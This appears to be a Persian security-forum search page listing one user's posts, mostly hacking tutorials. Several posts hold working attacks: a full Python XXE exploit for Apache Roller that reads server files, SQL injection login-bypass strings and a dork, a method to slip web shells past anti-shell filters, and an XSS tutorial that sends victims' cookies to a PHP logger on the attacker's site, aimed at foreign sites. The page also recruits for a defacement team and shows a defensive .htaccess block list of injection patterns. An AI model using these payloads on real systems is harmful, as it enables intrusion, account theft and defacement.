جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'mr.msa'.
49 نتیجه پیدا شد
-
sql injection آموزش آسیب پذیری Sql Injection (ویدئویی)
Sadra پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .- 45 پاسخ
-
- sql injection vulnerability
- اموزش ویدئویی
-
(و 55 مورد دیگر)
برچسب زده شده با :
- sql injection vulnerability
- اموزش ویدئویی
- vulnerability
- site hacking
- اموزش وب هکینگ
- sql injection method
- sql injection bypass
- sql injection ویدئویی
- sqli attack
- باگ بانتی
- هک
- تارگت های تمرینی
- video
- mysql
- polygon
- دیتابیس هکینگ
- وب هکینگ
- database attack
- سرور هکینگ
- هکر
- bug bounty
- باگ
- تارگت
- sqli
- bug
- web hacking
- bug crowd
- waf
- تزریق sql
- database hacking
- آموزش ویدئویی
- sql
- hack
- mr.msa
- bypass
- firewall
- mssql
- like
- cdn
- waf bypassing
- web application firewall
- cloudflare
- اموزش تست و نفوذ
- تارگت sql injection (تست و نفوذ ویدئویی )
- اسیب پذیری های تحت وب
- اسیب پذیری
- اسیب پذیری های سایت
- join
- اموزش هک
- اسیب پذیری sql injection
- اموزش به صورت ویدئویی
- sqli vulnerability
- website vulnerability
- اموزش هک سایت
- اموزش هک سایت با sqli
- اموزش دسترسی به دیتابیس
- اموزش برداشتن دیتابیس یک سایت
-
با سلام خدمت دوستان عزیز سایت zone-hc.ir یا همون zone-h ایرانی دوباره راه اندازی شده: [Hidden Content]
-
با سلام خدمت دوستان عزیز در این ویدئو آموزش اتصال دامنه به گیت هاب رو بهتون دادم یادتون نره حتما ویدئو رو لایک و چنل رو ساب کنید. یوتیوب: لینک در اپارات : [Hidden Content]
-
- اتصال دامنه به گیت هاب | github pages
- github
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز شاید قبلا Guardiran Exploit Database رو جز خدمات Mr.MSA دیده باشید: اما از الان به بعد برای این پروژه یک دامین جدید گرفتم و به پروژه جدا تبدیل شد: exploit-db.ga نکات مهم درمورد این سیستم: ۱- این سیستم کلا از خدمات MR.MSA جدا میشه ولی از طرفی یکی از خدمات و پروژه های من هست! ۲- دامین تا یک سال تمدیده. ۳- پروژه که php بود رو html کردم. ۴- سورس در گیتهاب موجود میباشد. ۵- اکسپلویت های بخش vip انجمن قرار داره. لینک گیت هاب موفق و پایدار باشید.
-
- اکسپلویت های انجمن تیم امنیتی گاردایران
- اکسپلویت
- (و 12 مورد دیگر)
-
msa service خدمات MR.MSA | ورژن 1.8 | ورژن 2 به زودی
Sadra پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی
MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش : R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .- 8 پاسخ
-
- msacms tools
- بلودیت
-
(و 79 مورد دیگر)
برچسب زده شده با :
- msacms tools
- بلودیت
- wordpress xss
- wordpress 5.5
- cms security
- ssrf
- bug privet
- تایپو ۳
- mr-msa.xyz
- جوملا
- rfi
- sql injection
- وردپرس
- sqli
- typo3 cms
- bug crowd
- bug bounty
- csrf
- تمرین تست نفوذ و یادگیری cms ها
- wordpress
- joomla
- msacms
- آزمایشگاه تحلیل باگ
- cms
- shell
- آزمایشگاه تست نفوذ
- uploader
- آموزش cms
- web application bug
- madesimple
- bug
- bludit
- cms typo3
- باگ
- lfi rfi
- webapplication hacking
- rfu
- bludit cms
- msacms+
- concrete5
- cms bludit
- cmsmadesimple
- sql injention
- تست امنیت
- waf
- upload
- upload shell
- wordpress them
- database mysql
- firewall
- باگ پرایوت و مکان ازمایشگاهی با msacms | ورژن 1.5.0
- آزمایشگاه
- .xyz
- سیستم مدیریت محتوا
- wordpress 5.5.3
- mr-msa
- hack
- waf bypassing
- امنیت
- typo3
- program
- php
- tools
- web security
- دروپال
- rce
- web application firwall
- اموزش
- web application security
- lfi
- mr.msa
- xss
- drupal
- .cf
- wordpress 5.6
- security
- web design
- web developer
- html
- css
- js
-
با سلام خدمت دوستان عزیز با اموزش اسیب پذیری XXE یا XML External Entity در خدمت شما هستیم . توضیجات اولیه : با استفاده از این اسیب پذیری شما قادر به دسترسی به فایل های سمت سرور و سیستمی دارید این اسیب پذیری سمت سرور است و زمانی رخ میده که ارسال ورودی xml انجام شده باشه و بر ورودی ها نظارت نباشه و خوب کانفیگ نکرده باشن ، از مزایای دیگر اسیب پذیری میتوان به استخراج اطلاعات حساس اسکن پورت های باز و جعل درخواست سمت سرور رو انجام داد ، ضعفی که باعث می شود این آسیب پذیری به وجود آید سمت سرور است که با دستورات XML Parser انجام میشود و اگردرخوست های ورودی توسط کلاینت به سرور رو خوب کنترل نکرده باشند باعث میشه که نفوذگر با استفاده از دستورات XML Parser اقدام به حمله کند . آشنایی با XML Parser : XML Parser یک آبجکتی است که اکثر مرورگر ها اونو ساپورت می کنند می توانید داکیومنت ها و اطلاعات را نیز استخراج کند و همچنین اقدام به خواندن تگ های XML کنید . XPath Injection : اسیب پذیری XXE Injection خیلی شباهت داره به اسیب پذیری Xpath Injection که قبلا اموزشش رو در انجمن قرار دادم : انواع حملات XXE : : Exploiting XXE to retrieve file در این حمله استخراج اطلاعات صورت میگیرد : Exploiting XXE to Perform SSRF attack در این حمله امکان ترکیب اسیب پذیری SSRF هم وجود دارد . : Exploiting Blind XXE exfiltrate data out-of-band این حمله زمانی صورت می گیره که داده های حساس در حال انتقال از میان سرور و کاربر هستند و جایی که داده ها از سرور برنامه به سیستمی منتقل می شوند و هکر می تواند آن ها رو کنترل کند . توی این جلسه قراره به حمله Exploiting XXE to retrieve file بپردازیم : برای مثال شما یک فرم رو سابمیت میکنید یا هر چیز دیگه بعد با استفاده از ابزار Burp Suite درخواست ها رو برسی میکنید و برای مثال این کد رو مشاهده میکنید : <?xml version=”1.0” encoding=”UTF-8”?> و در این تگ برخی از این پارامتر ها اومده : <stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> حالا اگر بین این دو تگ این دستور xml رو قرار دهید و پارامتر ۲ را تغییر دهید فایل passwd رو فراخوانی میکنه : <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> کد اولیه (بدون هیچ تغییر ) : <?xml version=”1.0” encoding=”UTF-8”?><stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> و تبدیلش میکنیم به این : <?xml version=”1.0” encoding=”UTF-8”?> <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> <stockCheck><productld>&xxe;</productld><storeld>1</storeld></stockCheck> و توی پاسخ میبینید که فایل passwd رو فراخوانی کرده ، در ضمن باید توی burp از قسمت repeater اقدام کنید . ویدئو : تئوری . پروژه محور یک . پروژه محور دو . اکسپلویت : # Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) # Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}" # Date: 2018-09-05 # Exploit Author: Marko Jokic # Contact: [Hidden Content] # Vendor Homepage: [Hidden Content] # Software Link: [Hidden Content] # Version: < 5.0.3 # Tested on: Linux Ubuntu 14.04.1 # CVE : CVE-2014-0030 # This exploit lets you read almost any file on a vulnerable server via XXE vulnerability. # There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'. # 'SIMPLE' payload will work in most cases and will be used by default, if # server errors out, use 'ADVANCED' payload. # 'ADVANCED' payload will start local web server and serve malicious XML which # will be parsed by a target server. # To successfully perform attack with 'ADVANCED' payload, make sure that port # you listen on (--lport flag) is accessible out of the network. #!/usr/bin/env python import SimpleHTTPServer import SocketServer import argparse import sys import threading from xml.etree import ElementTree import urllib3 import requests SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file://{}">]> <methodCall> <methodName>&xxe;</methodName> </methodCall> """ ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file://{}"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "{}"> %dtd; ]> <methodCall> <methodName>&all;</methodName> </methodCall> """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<!ENTITY all "%start;%xxe;%end;">') def check_exploit(host): response = requests.post(host + "/roller-services/xmlrpc", verify=False) if response.status_code == 200: return True return False def exploit(host, payload): response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False) xml_tree = ElementTree.fromstring(response.text) parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text print parsed_response def start_web_server(port): handler = MyHandler httpd = SocketServer.TCPServer(('', port), handler, False) httpd.allow_reuse_address = True httpd.server_bind() httpd.server_activate() httpd.handle_request() httpd.shutdown() def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL") parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server") parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server") parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on") args = parser.parse_args() host = args.url full_file_path = args.file advanced = False lhost = args.lhost lport = args.lport if lport is not None and lport is not None: advanced = True check = check_exploit(host) if check: if advanced: th = threading.Thread(target=start_web_server, args=(lport,)) th.daemon = True th.start() payload = ADVANCED_PAYLOAD.format(full_file_path, "[Hidden Content](lhost, lport)) else: payload = SIMPLE_PAYLOAD.format(full_file_path) exploit(host, payload) else: print "[-] TARGET IS NOT VULNERABLE!" main() مقاله : یک سری مقاله که میتونه خیلی مفید باشه . Owasp : [Hidden Content]_Processing Owasp : [Hidden Content] Doddsecurity : [Hidden Content] Medium : [Hidden Content] Exploit DB : [Hidden Content] ====================================================================== لایک فراموش نشه ، موفق و پیروز باشید .
- 7 پاسخ
-
- file include
- port scanning
-
(و 17 مورد دیگر)
برچسب زده شده با :
- file include
- port scanning
- xxe vulnerability
- (xxe vulnerability | xml external entity (xxe
- vulnerability
- xml injection
- xml external entity (xxe)
- mr.msa
- bug
- xxe
- injection bug
- xxe injection
- web hacking
- xml external entity injection
- web application security
- web application bug
- xml file
- web site security
- xml
-
با سلام خدمت دوستان عزیز در این ویدئو که از مجموعه تست آسیب پذیری سایت ها بود ما کپچا دو سایت هاستینگ رو بررسی کردیم! سعی کردم تجربیاتم رو به خوبی انتقال بدم و به بهترین شکل ویدئو باشه. ( از بابت بالا بودن صدای اهنگ هم شرمنده ویدئوی بعدی حتما برطرف میشه) موفق و پیروز باشید.
-
- cpatcha
- check site
- (و 16 مورد دیگر)
-
لطفا در نظر سنجی قرار دادن ویدئوی تست و نفوذ وبسایت ها و کشف باگ که بیشتر سایت ها هست شرکت کنید.
- 4 پاسخ
-
- hacking training
- mr.msa
- (و 10 مورد دیگر)
-
با سلام خدمت دوستان عزیز ویدئوی جدید در رابطه با راه های کسب درآمد از هک و امنیت که خیلی ها علاقه دارن لینک سایت های استفاده شده : hackerone.com bugdasht.ir kolahsefid.org faradars.org faranesh.com toplearn.com maktabkhooneh.org exploit-db.com
-
با سلام خدمت دوستان عزیز انجمن تیم امنیتی گاردایران . چند هفته پیش دو وب سایت خبری رو گزارش کردم که خواستم اینجا قرار بدم . وب سایت اول پایگاه خبری هاناخبر : [Hidden Content] وب سایت دوم پایگاه خبر زریان موکریان : [Hidden Content] و در کنارش اسیب پذیری های شرکت کیهان افزار رو هم گزارش کردم اما پستی نزاشتن برای همین فقط لینک سایت رو میزارم . تشکر میکنم از شرکت کیهان افزار که به خوبی اسیب پذیری ها رو تایید کردن و بحث های امنیتی رو رعایت میکنند . موفق و پیروز باشید .
-
- گزارش اسیب پذیری دو وبسایت خبری
- web hacking
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
xpath injection Xpath Injection Vulnerability Training
Sadra پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید : دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .-
- web application firewall bypass
- waf
- (و 16 مورد دیگر)
-
با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+
- 24 پاسخ
-
- web security
- web
- (و 13 مورد دیگر)
-
رفع اسیب پذیری Sql Injection با استفاده از Htaccess
Sadra پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام خدمت دوستان عزیز گاردایران . در اینجا کدی رو قرار میدم که میتونید از اون برای جلوگیری از اسیب پذیری Sql Injection استفاده کنید اما این رو در نظر داشته باشید که فقط ایمن سازی با htaccess جالب نیست و بهتره در کنارش اسیب پذیری رو از طریق توابع و یا استفاده از PDO و .. رفع کنیم ، ایمن سازی با htaccess فقط برای محکم کاری هست . <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|information_schema|table_name|convert|alter|declare|order|script|set|md5|benchmark|encode|extractvalue|rand()|concat|group_concat|from|From|,|.|+|order|by) [NC,OR] </IfModule> موفق و پیروز باشید .-
- رفع اسیب پذیری sql injection
- sqli
- (و 11 مورد دیگر)
-
با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
-
- bypass
- admin page
-
(و 10 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @Dr.Kali 4- @HCSH4C39 5- @mmj-sys 6- @KR0N0S 7- @SHIWPTS13 8- @Scary مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
- 6 پاسخ
-
- python programming
- php
- (و 16 مورد دیگر)
-
با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
- 1 پاسخ
-
- shell
- anti shell
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار : با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ : برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید : <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="[Hidden Content]=" + document.cookie </script> یا <script>document.location="[Hidden Content]="%2bdocument.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : [Hidden Content] و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موفق و پیروز باشید .
-
با سلام خدمت شما دوستان عزیز انجمن تیم امنیتی گاردایران با یک ابزار در خدمتتون هستیم . Mr.Hasher نویسنده نسخه PHP: @MR.MSA نویسنده نسخه C# : @HCSH4C39 نحوه استفاده : امروز می خوام یه ابزار رو ارائه بدم که شما یک متن رو میدید بهش و برای شما به انواع هش ها هش میکنه . نسخه : این برنامه در دو نسخه php و c# ارائه می شود که php تحت وب و c# قابلیت اجرایی exe (تحت ویندوز) هست . نوع هش ها : در نسخه php MD5 MD4 MD2 SHA1 SHA224 SHA256 SHA384 SHA512 SHA3-224 SHA3-256 SHA3-384 SHA3-512 RIPEMD-128 RIPEMD-160 RIPEMD-256 RIPEMD-320 FNV132 FNV1A64 FNV164 FNV1A32 HAVAL-128,3 HAVAL-160,3 HAVAL-192,3 HAVAL-224,3 HAVAL-256,3 HAVAL-128,4 HAVAL-160,4 HAVAL-192,4 HAVAL-224,4 HAVAL-256,4 HAVAL-128,5 HAVAL-160,5 HAVAL-192,5 HAVAL-224,5 HAVAL-256,5 TIGER-128,3 TIGER-160,3 TIGER-192,3 TIGER-128,4 TIGER-160,4 TIGER-192,4 ADLER-32 CONVERTUUENCODE GOST JOAAT CRC32C CRC32B CRC32 SNEFRU WHIRLPOOL BASE64 HEX ASCII در نسخه C# MD5 SHA 160 SHA 256 SHA 384 SHA 512 RIPEMD 160 لینک های مهم : 1- GitHub 2- Demo Online موفق و پیروز باشید .
-
- online hash
- whirlpool
-
(و 45 مورد دیگر)
برچسب زده شده با :
- online hash
- whirlpool
- mr.hasher tool
- crack
- snefru
- crc32c
- crc32
- crc32b
- joaat
- gost
- adler-32
- haval
- convertuuencode
- fnv1a32
- fnv164
- fnv1a64
- fnv132
- ripemd-320
- ripemd
- ripemd-256
- ripemd-160
- ripemd-128
- sha3-512
- sha3-256
- sha3-384
- sha3-224
- md2
- md4
- sha512
- sha256
- sha1
- hack
- md5
- hacker
- hash
- base64
- mr.hasher
- hacking
- tools
- hex
- ascii
- mr.msa
- هش
- آموزش هش
- هش چیست؟
- tool
- defacer tools
-
با سلام خدمت دوستان عزیز گاردایران در این تاپیک قصد دارم زبان برنامه نویسی CSS رو به شما آموزش بدهم . ----------------------------------------------------------------------------------------------------------------------- ابتدا کمی با css اشنا شویم : css یک زبان برنامه نویسی تحت وب هست که بیشتر در کنار html استفاده می شود ، این زبان برای طراحی سایت از نظر ظاهری هست . برای مثال رنگ متن ها ، پس زمینه ، نوع اسکرول و ... رو با css طراحی می کنند . امروزه که بیشتر افراد به طراحی وب و برنامه نویسی تحت وب روی اورده اند زبان css می تونه زبان کاربردی باشه . پیش نیاز css ، اشنایی با زبان html هست . دیگه بیشتر از این سرتون رو درد نمیارم . 😄 ----------------------------------------------------------------------------------------------------------------------- سبک های اضافه کردن css به html : ۱- خارجی و یا External ۲- داخلی و یا internal ۳- درون خطی و یا inline که در تاپیک بعد به همراه مثال خدمتتون عرض می کنم . ----------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : اسپم ندید . سوالات رو در پ.خ ارسال کنید . کتاب و مقالات رو در اینجا ارسال نکنید . (مگر اینکه خودتون نوشته باشید) اگر قصد گذاشتن آموزشی در رابطه با css دارید ابتدا به من پیام دهید (در غیر این صورت پست شما حذف می شود ) . موفق و پیروز باشید .
- 7 پاسخ
-
- سورس
- css3
-
(و 29 مورد دیگر)
برچسب زده شده با :
- سورس
- css3
- آموزش css
